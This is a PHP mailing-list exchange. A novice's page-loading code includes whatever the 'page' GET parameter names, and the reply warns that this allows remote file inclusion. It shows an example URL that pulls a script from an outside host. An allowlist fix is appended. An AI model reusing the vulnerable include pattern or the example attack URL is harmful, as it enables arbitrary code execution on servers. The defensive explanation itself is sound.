> if (isset($page)) {
>     include $$_GET['page'];
> } else {
>     $page = $home;
>     include $page;
> }
>
> would that be right?
> or should i use
>
> if (isset($page)) {
>     include $$_GET['page'];
> } else {
>     include $home;
> }
>
> hopefully that's right. if so, pretty good for a n00b
>
I don't think I'd let someone pass any page they wanted via a get and just include that page. If you have URL fopen wrappers on I can create a page on my server and include it to your page and pretty much execute any code I want on your server.

example:
http://www.yourdomain.com?yourscript.php?page=http://mydomain.com/myscript.php

Now my code is included in your page and executed. Do you really trust me to only have nice code in my page?

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
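
One way to close the hole the reply describes, as an added example that is not part of the original thread: the request only selects a key from a fixed allowlist, so no request-supplied string ever reaches `include`. The page keys, file names and the `resolve_page()` helper are hypothetical.

```php
<?php
// Added example: allowlist-based page selection. The directory, page keys
// and file names are hypothetical; replace them with the site's real pages.

const PAGES_DIR = __DIR__ . '/pages';

// Only these keys can ever reach include; the request never supplies a path.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Map the untrusted "page" request parameter to a file on the allowlist.
 * Anything missing, non-string, or unknown falls back to the home page.
 */
function resolve_page(array $query): string
{
    $key = $query['page'] ?? 'home';

    // ?page[]=x arrives as an array, so treat every non-string as invalid.
    if (!is_string($key) || !array_key_exists($key, ALLOWED_PAGES)) {
        $key = 'home';
    }

    return PAGES_DIR . '/' . ALLOWED_PAGES[$key];
}

// Constructed sample requests, standing in for $_GET.
$samples = [
    [],                                              // no parameter at all
    ['page' => 'about'],                             // legitimate page
    ['page' => 'http://mydomain.com/myscript.php'],  // the URL from the reply
    ['page' => 'no-such-page'],                      // unknown key
    ['page' => ['about']],                           // array instead of string
];

foreach ($samples as $query) {
    $shown = json_encode($query, JSON_UNESCAPED_SLASHES);
    printf("%-48s => %s\n", $shown, resolve_page($query));
}

// In the real script the resolved path is what gets included:
//     include resolve_page($_GET);
```

Setting `allow_url_fopen` to Off in php.ini (and, on PHP 5.2 and later, leaving `allow_url_include` Off) removes the remote-include path at the configuration level as well.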